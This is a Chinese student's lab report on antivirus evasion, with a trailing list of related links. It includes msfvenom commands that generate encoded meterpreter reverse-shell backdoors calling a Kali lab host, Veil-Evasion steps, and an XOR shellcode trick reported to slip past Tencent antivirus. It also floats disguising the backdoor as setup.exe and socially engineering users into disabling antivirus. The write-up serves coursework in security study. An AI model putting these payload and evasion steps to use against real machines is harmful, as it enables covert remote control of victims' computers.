zoukankan      html  css  js  c++  java
  • 20155201 网络攻防技术 实验三 免杀原理与实践

    20155201 网络攻防技术 实验三 免杀原理与实践

    一、实践内容

    • 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
    • 通过组合应用各种技术实现恶意代码免杀
    • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

    二、报告内容:

    1. 基础问题回答

    1. 杀软是如何检测出恶意代码的?
    • 基于特征码的检测:
      杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。
    • 启发式恶意软件的检测:
      将一个软件与杀毒软件记录过的恶意软件的行为、代码等等作比对,如果发现相似度达到某一值时,随即判定这个程序为恶意代码,有一定误报可能。
    • 基于行为的恶意软件检测:
      在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉;
    2. 免杀是做什么?

    “免杀”的杀是指杀毒软件、病毒搜索检测引擎等,“免杀”是指想要一段程序能够成功避开或者是伪装下通过杀毒软件的检测,进入系统。

    3. 免杀的基本方法有哪些?
    • 改变特征码
      • 对exe可执行文件加壳:压缩壳 加密壳
      • 用encode对shellcode进行编码,或者基于payload重新编译生成可执行文件
      • 将源代码用其他语言进行重写再编译(veil-evasion)
    • 改变行为
      • 通讯方式:尽量使用反弹式连接,使用隧道技术,加密通讯数据
      • 操作模式:基于内存操作。减少对系统的修改,加入混淆作用的正常功能代码
    • 其他方法
      • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中
      • 使用社会工程学类攻击,诱骗目标关闭AV软件、点击木马软件
      • 手写一个恶意软件

    2. 实践总结与体会

    通过这次实验可以了解到,实现免杀的技术真的很多很多,模板之类的数不胜数不说,还有很多大牛可以手工编译,瞬间感觉这次试验只是一个幼儿园小朋友的尝试……体验过才是真的拥有了经验,当别人问我免杀是什么,如何实现的时候,我可以清楚地告诉他我尝试过的方法,哪些失败哪些成功,这也是一种收获……

    3. 离实战还缺些什么技术或步骤?

    感觉最缺的是一个……脚本?怎样把生成的exe放到想要攻击的电脑上?又如何让电脑主人或者电脑自己乖乖运行我的exe
    现在想到的是通过U盘,伪装成某软件的安装程序setup.exe,不过上过这个课的同学谁还会随便运行一个exe啊……

    4. 实践过程记录

    a. 使用msf生成后门程序的检测

    • 首先对上次实验msf生成的backdoor.exe进行扫描,放到Virscan上扫描一下

    • 可以看出暴露度还是比较高的

    • 尝试使用msf多编码几次,看一下是否有变化:

    • 对了,先说一句,我是先安装的veil-evasion,在做的这一步,结果gg,全都是泡沫,建议大家先做这一步,再下载安装evasion,不然没快照过怕是要哭。
      编码一次:

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=10.211.55.5(Kali IP) LPORT=5201 -f exe > met-encoded.exe
    

    编码10次:

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=10.211.55.5(Kali IP) LPORT=5201 -f exe > met-encoded.exe
    


    • 编码次数再多,也没什么实质性的变化,shikata_ga_nai总会有解码`部分需要加入的exe中,人家进行特征查杀你就gg了。
      b. 使用veil-evasion生成后门程序的检测

    • 在Kali终端中使用sudo apt-get install veil安装(安装很慢,容易error,且行且珍惜)

    • 安装完成后继续安装Veil-Evasion

    • 后面好像是在安装python?但是好像出过错

    • 安装完成后,在终端中使用veil命令进入应用,输入use evasion进入veil-evasion

    • 输入use python/meterpreter/rev_tcp.py,然后设置回连IP和端口,生成后门文件:

    • 选择1

    • 没生成可执行文件的我很绝望很伤心,然后我发现我不是一个人…还有几个同学选择Python语言没生成可执行文件…所谓的迟到的时候最想见到的是另一个迟到的同学,我又燃起了生活的希望……换了个语言

    • use c/meterpreter/rev_tcp.py

    • 后面一样,然后生成了可执行文件

    • 放到网站上扫描一下,

    • 然后往win7里使劲一拖……没了

    • 原来是被隔离了

    • 尝试回连,成功


    • c. 利用shellcode编程实现免杀

    • 使用msf生成一个C语言格式的shellcode

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.5 LPORT=5201 -f c

    • 尝试交叉编译,结果gg……编译完无法运行

    • 在win7中下载Visual Studio2017

    • tips:win7也是可以好好运行VS2017的,需要你的win7是SP1版本,(版本可以右击计算机属性查看),然后还需要你下载net framework4.5,这个去微软官网可以下载,其他要求参照VS官网发行说明-系统要求即可。

    • 双击安装程序,选择桌面C++开发,安装……从此以后我的win7虚拟机拥有了一个编译器。

    • 把shellcode写成c文件,编译生成的exe文件在Debug文件夹里

    • 尝试回连

    d. 组合应用技术实现恶意代码免杀

    为了实现免杀,我和室友和小组成员试了很多方法……最后大家都找到了自己的方法…………而我实现的最晚…………不过好在还是成功了,这里列出尝试过的方法
    
    1. msf+https服务……被腾讯预言家查杀 msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=10.211.55.5 -f c
    2. Veil C语言exe+压缩壳 这个室友成功了,我试了一下压缩完查杀率更高嘻嘻
    3. Veil python源代码+py2exe
    在kali中使用veil的python模板生成不了exe,我记得安装过程中好像是python哪里出了错;换一下方法,还是python模板,generate之后选择2 py2exe,然后把setup.py,runme.bat,test.py拷到win7里面,在python 官网下载3.5.0版本的python,记得选择添加python到PATH,然后在命令行里使用pip install py2exe安装其他模块,然后python setup.py py2exe就能生成exe了,室友win10亲测完美,我么……反正不行
    我编译完的exe又是有错的为什么QAQ
    4. shellcode Vs编译+压缩壳
    压缩完爆率更高哦~
    5. 尝试veil其他模板的可执行文件
    试了cs?我其实也不知这是啥,但是确实有exe生成,然而会被查杀
    

    下面!是本人!成功实现免杀的方法!(再也不爱压缩了)
    shellcode异或!高亮&加粗!!
    我看到上一届的学长学姐基本都是异或、逆序之类的,其他方法都died了,不如就试试这个吧……
    我是用Xcode写了个程序把shellcode每一字节跟0x52异或,然后再回到win7 Vs,main函数里再把它异或回去,修改一些地方(不让贴代码,其他方法都失败了的可怜朋友们可以问我)然后编译……生成exe,尝试回连:

    放到网站上扫描一下

    腾讯管家木马查杀:啊朋友再见,啊朋友再见,啊朋友再见吧再见吧再见吧

    终于实现了免杀TAT。本次实验结束……

  • 相关阅读:
    入门菜鸟
    FZU 1202
    XMU 1246
    Codeforces 294E Shaass the Great 树形dp
    Codeforces 773D Perishable Roads 最短路 (看题解)
    Codeforces 814E An unavoidable detour for home dp
    Codeforces 567E President and Roads 最短路 + tarjan求桥
    Codeforces 567F Mausoleum dp
    Codeforces 908G New Year and Original Order 数位dp
    Codeforces 813D Two Melodies dp
  • 原文地址:https://www.cnblogs.com/zhuohua/p/8716955.html
Copyright © 2011-2022 走看看